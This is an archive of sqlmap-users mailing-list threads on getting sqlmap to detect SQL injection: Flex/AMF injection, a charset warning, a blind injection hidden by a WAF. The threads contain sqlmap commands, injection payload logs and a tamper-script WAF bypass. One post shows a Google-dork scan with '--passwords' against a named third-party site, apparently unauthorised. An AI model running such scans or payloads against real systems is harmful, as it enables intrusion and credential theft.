sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] AMF sqli injection

[Brandon P. <bpe...@gm...>]

Flex is hard because you have to update the integer that tells flex how
long a string is, unless I am mistaken.

If not, you could try with the * marker to tell sqlmap exactly where the
injection point is.

On Thu, May 28, 2015 at 1:21 PM, Christopher Downs <
chr...@ch...> wrote:

> Good afternoon gents,
> I am a profession penetration tester and have a rather difficult injection
> point for one of my customers.
>
> I can trigger the exception by pausing traffic with burp and inserting
> NULL's into the user | pass via a back end flex call. Is there a way to
> take advantage of sqlmap to inject via flex remoting objects ?
>
> If not I will have to write this myself but I thought I may ask the list
> first.
>
> Thanks.
> Sincerely,
> Christopher M Downs
>
> --
> [image: Description: Chrome]
>
> Chris Downs | System Administrator
>
> main
>
> 888.781.0088
>
> email
>
> *chr...@ch... <chr...@ch...>*
>
> web
>
> www.chromeriver.com
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] AMF sqli injection

[Christopher D. <chr...@ch...>]

Good afternoon gents,
I am a profession penetration tester and have a rather difficult injection
point for one of my customers.

I can trigger the exception by pausing traffic with burp and inserting
NULL's into the user | pass via a back end flex call. Is there a way to
take advantage of sqlmap to inject via flex remoting objects ?

If not I will have to write this myself but I thought I may ask the list
first.

Thanks.
Sincerely,
Christopher M Downs

-- 
[image: Description: Chrome]

Chris Downs | System Administrator

main

888.781.0088

email

*chr...@ch... <chr...@ch...>*

web

www.chromeriver.com

Re: [sqlmap-users] Reporting: Unknown web page charset

[Miroslav S. <mir...@gm...>]

Hi Daniel.

Thank you for your report. This should be "patched" long time ago. Please
update to the latest revision from our GitHub repository to have it up to
date (https://github.com/sqlmapproject/sqlmap/).

Kind regards,
Miroslav Stampar

On Sat, May 23, 2015 at 9:34 PM, Daniel Devereux <
dan...@gm...> wrote:

> *Reporting*
> [20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sql...@li....
>
> *Command*
> sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords
>
> *Terminal Readout*
> GET http://www.sh-sinap.com/en/Showpro.asp?id=6
> do you want to test this URL? [Y/n/q]
> > Y
> [20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6
> '
> [20:21:40] [INFO] testing connection to the target URL
> [20:21:46] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [20:21:50] [INFO] target URL is stable
> [20:21:50] [INFO] testing if GET parameter 'id' is dynamic
> [20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
> [20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
> might not be injectable
> [20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
> [20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> *[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sql...@li...
> <sql...@li...>.*
> [20:21:53] [INFO] heuristics detected web page charset 'GB2312'
> [20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
> clause'
> [20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause'
> [20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
> (XMLType)'
> [20:22:46] [INFO] testing 'MySQL inline queries'
> [20:22:47] [INFO] testing 'PostgreSQL inline queries'
> [20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [20:22:53] [INFO] testing 'Oracle inline queries'
> [20:22:55] [INFO] testing 'SQLite inline queries'
> [20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [20:22:56] [CRITICAL] there is considerable lagging in connection
> response(s). Please use as high value for option '--time-sec' as possible
> (e.g. 10 or more)
> [20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
> [20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> [20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
> sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
> Do you want to follow? [Y/n] Y
> [20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> [20:23:47] [INFO] testing 'Oracle AND time-based blind'
> [20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [WARNING] using unescaped version of the test because of zero
> knowledge of the back-end DBMS. You can try to explicitly set it using
> option '--dbms'
> [20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:47] [CRITICAL] connection timed out to the target URL or proxy
> [20:29:10] [WARNING] user aborted during detection phase
> how do you want to proceed? [(S)kip current test/(e)nd detection
> phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
> [20:29:22] [WARNING] GET parameter 'id' is not injectable
> [20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
> to increase '--level'/'--risk' values to perform more tests. Also, you can
> try to rerun by providing either a valid value for option '--string' (or
> '--regexp'), skipping to the next URL
> [20:29:22] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 15 times
>
> Regards
> Dan
>
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Reporting: Unknown web page charset

[Daniel D. <dan...@gm...>]

*Reporting*
[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sql...@li....

*Command*
sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords

*Terminal Readout*
GET http://www.sh-sinap.com/en/Showpro.asp?id=6
do you want to test this URL? [Y/n/q]
> Y
[20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6'
[20:21:40] [INFO] testing connection to the target URL
[20:21:46] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[20:21:50] [INFO] target URL is stable
[20:21:50] [INFO] testing if GET parameter 'id' is dynamic
[20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
[20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
might not be injectable
[20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
[20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
*[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sql...@li...
<sql...@li...>.*
[20:21:53] [INFO] heuristics detected web page charset 'GB2312'
[20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
clause'
[20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE or HAVING clause'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
(XMLType)'
[20:22:46] [INFO] testing 'MySQL inline queries'
[20:22:47] [INFO] testing 'PostgreSQL inline queries'
[20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:53] [INFO] testing 'Oracle inline queries'
[20:22:55] [INFO] testing 'SQLite inline queries'
[20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:22:56] [CRITICAL] there is considerable lagging in connection
response(s). Please use as high value for option '--time-sec' as possible
(e.g. 10 or more)
[20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
Do you want to follow? [Y/n] Y
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:47] [INFO] testing 'Oracle AND time-based blind'
[20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:25:38] [WARNING] using unescaped version of the test because of zero
knowledge of the back-end DBMS. You can try to explicitly set it using
option '--dbms'
[20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:47] [CRITICAL] connection timed out to the target URL or proxy
[20:29:10] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection
phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
[20:29:22] [WARNING] GET parameter 'id' is not injectable
[20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
to increase '--level'/'--risk' values to perform more tests. Also, you can
try to rerun by providing either a valid value for option '--string' (or
'--regexp'), skipping to the next URL
[20:29:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times

Regards
Dan

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Alistair J. <amc...@gm...>]

In the end, it was WAF behaviour that was preventing sqlmap from
identifying the parameter as injectable (more specifically, sqlmap was
sending SQL operators in upper case and the WAF was rejecting it). The
lower-case tamper script circumvented this but I was unable to take
exploitation any further because of other WAF blocking techniques.

On Thu, Apr 30, 2015 at 12:13 AM, Johnathon Doe <hoo...@gm...> wrote:
> Curious, have you tried using the --prefix and --suffix options to frame
> your injection to see if that helps?
>
> On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amc...@gm...>
> wrote:
>>
>> OK. You're right in that the following lines in your dummy output
>> should produce discernable responses when tested against the
>> application:
>> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>>
>> I've verified this manually. Thanks and I'll send you the traffic output
>> file.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > I would say that you screwed something up. Can you please send that
>> > traffic
>> > file I requested.
>> >
>> > Down below find a line that says: "[08:55:08] [PAYLOAD]
>> > PackageSelection'
>> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
>> > invalid.
>> >
>> > $ python sqlmap.py -u
>> > www.site.com/help/UserGuide.aspx?Sec=PackageSelection
>> > --dummy -v 3
>> >          _
>> >  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
>> > |_ -| . | |     | .'| . |
>> > |___|_  |_|_|_|_|__,|  _|
>> >       |_|           |_|   http://sqlmap.org
>> >
>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> > prior
>> > mutual consent is illegal. It is the end user's responsibility to obey
>> > all
>> > applicable local, state and federal laws. Developers assume no liability
>> > and
>> > are not responsible for any misuse or damage caused by this program
>> >
>> > [*] starting at 08:55:05
>> >
>> > [08:55:05] [DEBUG] cleaning up configuration parameters
>> > [08:55:05] [DEBUG] setting the HTTP timeout
>> > [08:55:05] [DEBUG] creating HTTP requests opener object
>> > [08:55:05] [DEBUG] heuristically checking if the target is protected by
>> > some
>> > kind of WAF/IPS/IDS
>> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
>> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
>> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
>> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
>> > couple of seconds
>> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
>> > comparison on a sequence matcher. If no dynamic nor injectable
>> > parameters
>> > are detected, or in case of junk results, refer to user's manual
>> > paragraph
>> > 'Page comparison' and provide a string or regular expression to match on
>> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
>> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
>> > retry the request
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 2485
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
>> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 8682
>> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
>> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter
>> > 'Sec'
>> > might not be injectable
>> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
>> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
>> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
>> > ...
>> >
>> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson
>> > <amc...@gm...>
>> > wrote:
>> >>
>> >> Hi Brandon,
>> >>
>> >> Thanks for your comment. Confirming that i've tried risk=3 with
>> >> level=5 with the same results. I've looked more closely at the
>> >> requests that sqlmap is sending to check if the parameter is
>> >> injectable. It is testing the Sec paramater with values such as:
>> >>
>> >> PackageSelection) AND 1477=7114
>> >> PackageSelection) AND 1631=1631
>> >> PackageSelection') AND 5603=7729
>> >> PackageSelection') AND 1631=1631
>> >> PackageSelection' AND 3943=9381
>> >> PackageSelection' AND 1631=1631
>> >> PackageSelection" AND 3324=4690
>> >> PackageSelection" AND 1631=1631
>> >> PackageSelection) AND 4734=6616 AND (6346=6346
>> >> PackageSelection)) AND 7350=9272 AND (8861=8861
>> >>
>> >> When in fact, i assume it would need to use logic like I used to get
>> >> distinguishable responses:
>> >>
>> >> PackageSelection (returns response A)
>> >> PackageSelection' AND '1'='1 (returns response A)
>> >> PackageSelection' AND '1'='2 (returns response B)
>> >>
>> >> In a nutshell, it doesn't appear to be trying single quotes and values
>> >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> >> typical format for checking boolean-based blind SQLi.
>> >>
>> >> Cheers,
>> >>
>> >> Alistair.
>> >>
>> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> >> <bpe...@gm...> wrote:
>> >> > It's a GET, so there wouldn't be a content type, unless I am
>> >> > mistaken.
>> >> >
>> >> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >> >
>> >> > Sent from a phone
>> >> >
>> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> >> > <mir...@gm...>
>> >> > wrote:
>> >> >
>> >> > Can you please send the unredacted content of request.txt to my
>> >> > address?
>> >> >
>> >> > If not, then please at least send me the content of traffic file
>> >> > which
>> >> > you
>> >> > can obtain by just appending the "-t traffic.txt" to the regular
>> >> > sqlmap's
>> >> > run.
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> >> > <amc...@gm...>
>> >> > wrote:
>> >> >>
>> >> >> Thanks for the quick reply.
>> >> >>
>> >> >> The contents of the request file are as follows:
>> >> >>
>> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> >> Host: <redacted>
>> >> >> Accept: */*
>> >> >> Accept-Language: en
>> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
>> >> >> Win64;
>> >> >> x64; Trident/5.0)
>> >> >> Connection: close
>> >> >> Referer: <redacted>
>> >> >> Cookie: <redacted>
>> >> >>
>> >> >> I've redacted some of the details as it's not appropriate to draw
>> >> >> attention to an internet facing application's SQLi vulnerability.
>> >> >>
>> >> >> When providing the request file as part of the following command:
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> >> manually.
>> >> >>
>> >> >> Thanks again,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> >> <mir...@gm...> wrote:
>> >> >> > And what is the content of request file?
>> >> >> >
>> >> >> > Bye
>> >> >> >
>> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> >> > <amc...@gm...>
>> >> >> > wrote:
>> >> >> >>
>> >> >> >> Hi sqlmappers,
>> >> >> >>
>> >> >> >> I'm a fairly experienced user of sqlmap having used it
>> >> >> >> extensively
>> >> >> >> in
>> >> >> >> the past. I came across what appeared to pretty typical
>> >> >> >> boolean-based
>> >> >> >> blind SQLi in an application I'm (legally) testing. However, for
>> >> >> >> the
>> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter
>> >> >> >> as
>> >> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> >> exploiting
>> >> >> >> blind SQLi is cumbersome to say the least.
>> >> >> >>
>> >> >> >> Here is a summary of the requests i've made to manually confirm
>> >> >> >> the
>> >> >> >> vulnerability.
>> >> >> >>
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> >> response
>> >> >> >> A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> >> response
>> >> >> >> B)
>> >> >> >>
>> >> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> >> would give me the best chance of success:
>> >> >> >>
>> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> >> 'industries' -v 1
>> >> >> >>
>> >> >> >> Note: the string 'industries' is text that appears in response A
>> >> >> >> but
>> >> >> >> not response B.
>> >> >> >>
>> >> >> >> I've looked at the requests that sqlmap is sending in the
>> >> >> >> background
>> >> >> >> (proxied through burp). It appears that it's attempting to
>> >> >> >> exploit
>> >> >> >> this with the AND statement as it should but is not using single
>> >> >> >> quotes as per my example above.
>> >> >> >>
>> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
>> >> >> >> i'd
>> >> >> >> be
>> >> >> >> more than happy to contribute some time to improve it so it can
>> >> >> >> identify injectable parameters such as these in the future.
>> >> >> >>
>> >> >> >> Thanks,
>> >> >> >>
>> >> >> >> Al.
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> ------------------------------------------------------------------------------
>> >> >> >> One dashboard for servers and applications across
>> >> >> >> Physical-Virtual-Cloud
>> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> >> Insights
>> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> >> _______________________________________________
>> >> >> >> sqlmap-users mailing list
>> >> >> >> sql...@li...
>> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > Miroslav Stampar
>> >> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> > ------------------------------------------------------------------------------
>> >> > One dashboard for servers and applications across
>> >> > Physical-Virtual-Cloud
>> >> > Widest out-of-the-box monitoring support with 50+ applications
>> >> > Performance metrics, stats and reports that give you Actionable
>> >> > Insights
>> >> > Deep dive visibility with transaction tracing using APM Insight.
>> >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >
>> >> > _______________________________________________
>> >> > sqlmap-users mailing list
>> >> > sql...@li...
>> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>> ------------------------------------------------------------------------------
>> One dashboard for servers and applications across Physical-Virtual-Cloud
>> Widest out-of-the-box monitoring support with 50+ applications
>> Performance metrics, stats and reports that give you Actionable Insights
>> Deep dive visibility with transaction tracing using APM Insight.
>> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi

[Johnathon D. <hoo...@gm...>]

Curious, have you tried using the --prefix and --suffix options to frame
your injection to see if that helps?

On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amc...@gm...>
wrote:

> OK. You're right in that the following lines in your dummy output
> should produce discernable responses when tested against the
> application:
> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>
> I've verified this manually. Thanks and I'll send you the traffic output
> file.
>
> Cheers,
>
> Alistair.
>
> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
> <mir...@gm...> wrote:
> > I would say that you screwed something up. Can you please send that
> traffic
> > file I requested.
> >
> > Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> > invalid.
> >
> > $ python sqlmap.py -u
> www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> > --dummy -v 3
> >          _
> >  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> > |_ -| . | |     | .'| . |
> > |___|_  |_|_|_|_|__,|  _|
> >       |_|           |_|   http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey
> all
> > applicable local, state and federal laws. Developers assume no liability
> and
> > are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 08:55:05
> >
> > [08:55:05] [DEBUG] cleaning up configuration parameters
> > [08:55:05] [DEBUG] setting the HTTP timeout
> > [08:55:05] [DEBUG] creating HTTP requests opener object
> > [08:55:05] [DEBUG] heuristically checking if the target is protected by
> some
> > kind of WAF/IPS/IDS
> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> > comparison on a sequence matcher. If no dynamic nor injectable parameters
> > are detected, or in case of junk results, refer to user's manual
> paragraph
> > 'Page comparison' and provide a string or regular expression to match on
> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> > retry the request
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 2485
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 8682
> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter
> 'Sec'
> > might not be injectable
> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> > ...
> >
> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...
> >
> > wrote:
> >>
> >> Hi Brandon,
> >>
> >> Thanks for your comment. Confirming that i've tried risk=3 with
> >> level=5 with the same results. I've looked more closely at the
> >> requests that sqlmap is sending to check if the parameter is
> >> injectable. It is testing the Sec paramater with values such as:
> >>
> >> PackageSelection) AND 1477=7114
> >> PackageSelection) AND 1631=1631
> >> PackageSelection') AND 5603=7729
> >> PackageSelection') AND 1631=1631
> >> PackageSelection' AND 3943=9381
> >> PackageSelection' AND 1631=1631
> >> PackageSelection" AND 3324=4690
> >> PackageSelection" AND 1631=1631
> >> PackageSelection) AND 4734=6616 AND (6346=6346
> >> PackageSelection)) AND 7350=9272 AND (8861=8861
> >>
> >> When in fact, i assume it would need to use logic like I used to get
> >> distinguishable responses:
> >>
> >> PackageSelection (returns response A)
> >> PackageSelection' AND '1'='1 (returns response A)
> >> PackageSelection' AND '1'='2 (returns response B)
> >>
> >> In a nutshell, it doesn't appear to be trying single quotes and values
> >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> >> typical format for checking boolean-based blind SQLi.
> >>
> >> Cheers,
> >>
> >> Alistair.
> >>
> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> >> <bpe...@gm...> wrote:
> >> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >> >
